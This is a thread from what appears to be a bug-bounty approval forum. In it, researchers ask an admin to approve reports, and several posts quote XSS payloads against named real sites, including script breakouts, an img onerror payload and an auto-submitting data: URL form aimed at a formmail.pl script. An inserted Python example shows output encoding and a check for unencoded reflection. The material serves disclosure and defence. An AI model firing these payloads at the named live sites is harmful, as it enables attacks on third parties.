
Re: Manual Approval Thread

Posted: Sun Mar 07, 2021 12:04 pm
by gabrielbc2013
Hello administrator, how are you?

Can you approve this report?

ID: 1942173

Thank you very much for your attention!

Re: Manual Approval Thread

Posted: Tue Mar 09, 2021 4:01 am
by x1admin
approved

Re: Manual Approval Thread

Posted: Tue Mar 09, 2021 2:02 pm
by amlnspqr
1939986 - click the fb button

Re: Manual Approval Thread

Posted: Tue Mar 09, 2021 3:20 pm
by JonLaing4
Hello, please approve ID 1945783
Visiting the url https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.

Re: Manual Approval Thread

Posted: Wed Mar 10, 2021 12:32 pm
by JonLaing4
Hello, please approve the following IDs:
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url https://jobs.world.edu/ and you will get the following xss triggered.
Screenshot from 2021-03-10 12-30-36.png
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered
Screenshot from 2021-03-10 12-31-56.png
Screenshot from 2021-03-10 12-32-13.png
Many thanks,

Re: Manual Approval Thread

Posted: Wed Mar 10, 2021 4:19 pm
by JonLaing4
Hello please approve ID 1946511.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>

When page automatically refreshes you get the xss triggered:
Screenshot from 2021-03-10 15-54-52.png
This is a problem with the formmail.py configuration with the site.
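The two JonLaing4 posts above (the search-box reports and the formmail.pl one) describe the same root cause: a user-supplied value is reflected into the response without output encoding. The Python below is an added example written by the editor; it is not code from the forum, from Open Bug Bounty, or from any of the sites named. The function names and the two rendering templates are hypothetical, and the sample inputs are the payload strings quoted in the thread, used only as test vectors. It puts the raw-reflection pattern beside its encoded form and adds the check a site owner can run over a captured response body to confirm whether a submitted value came back unencoded.

```python
import html
import re

# Constructed sample inputs: the strings quoted in the reports above, plus the
# img/onerror pattern from the formmail report, used here as test vectors only.
SAMPLE_PAYLOADS = [
    "'-->\"></script><script>alert(1)</script>\">",
    "'\">><marquee><img src=x onerror=confirm(1)></marquee>\">",
    "</script><script>alert(1)</script>\">",
    "<img src=x onerror=alert() ",
]

# Characters that can close element content or break out of a quoted attribute.
BREAKOUT_RE = re.compile(r"[<>\"']")


def escape_html(value: str) -> str:
    """Encode a string for HTML element content or a quoted attribute value.

    html.escape with quote=True encodes & < > " and ', which is sufficient for
    both contexts as long as attributes are actually quoted in the template.
    """
    return html.escape(value, quote=True)


def is_inert(encoded: str) -> bool:
    """True when no break-out character survives encoding."""
    return BREAKOUT_RE.search(encoded) is None


def render_search_page_unsafe(query: str) -> str:
    """The pattern the reports describe: the query is echoed verbatim into an
    attribute and into element content (hypothetical template)."""
    return (
        f'<input type="text" name="q" value="{query}">\n'
        f'<p>Results for: {query}</p>'
    )


def render_search_page(query: str) -> str:
    """Hardened rendering: the same template, with the query encoded at every
    insertion point. The attribute stays double-quoted so &quot; cannot end it."""
    q = escape_html(query)
    return f'<input type="text" name="q" value="{q}">\n<p>Results for: {q}</p>'


def render_missing_field_error(field_name: str) -> str:
    """Hardened form of a mail-script error page that names a required field
    taken from the submitted form (hypothetical template, not formmail.pl)."""
    return f"<p>The following field is required: {escape_html(field_name)}</p>"


def reflects_unencoded(response_html: str, submitted: str) -> bool:
    """Detection check for a captured response: the submitted value contains a
    break-out character and appears verbatim in the body, i.e. unencoded."""
    return BREAKOUT_RE.search(submitted) is not None and submitted in response_html


def hardened_neutralizes_all() -> bool:
    """Every sample payload is inert after encoding and is no longer reflected verbatim."""
    return all(
        is_inert(escape_html(p)) and not reflects_unencoded(render_search_page(p), p)
        for p in SAMPLE_PAYLOADS
    )


def unsafe_reflects_all() -> bool:
    """The raw-reflection template fails the check for every sample payload."""
    return all(reflects_unencoded(render_search_page_unsafe(p), p) for p in SAMPLE_PAYLOADS)


if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print("unsafe reflects:", reflects_unencoded(render_search_page_unsafe(p), p),
              "| hardened reflects:", reflects_unencoded(render_search_page(p), p))
    print(render_missing_field_error(SAMPLE_PAYLOADS[3]))
```

The check is deliberately simple: it only answers whether the exact probe came back untouched, which is what a triager needs to confirm one of these reports on a response they already hold. It says nothing about contexts where encoding alone is not enough, such as reflection inside an existing `<script>` block or an unquoted attribute, so templates should be reviewed for those separately.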

Re: Manual Approval Thread

Posted: Thu Mar 11, 2021 1:42 pm
by JonLaing4
Hello,
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss.
Screenshot from 2021-03-11 13-42-53.png
Screenshot from 2021-03-11 13-43-04.png
Many thanks

Re: Manual Approval Thread

Posted: Fri Mar 12, 2021 8:10 am
by dtulupov
Hello, please approve (Improper Access Control (IAC)):
1947620
1947623
1947624
1947625
1947626
1947638
1947641

Re: Manual Approval Thread

Posted: Sun Mar 14, 2021 4:51 pm
by PC_Mechanic
Hi Admin

Please approve 1922509

This is 100% reproducible

Re: Manual Approval Thread

Posted: Mon Mar 15, 2021 6:37 am
by x1admin
approved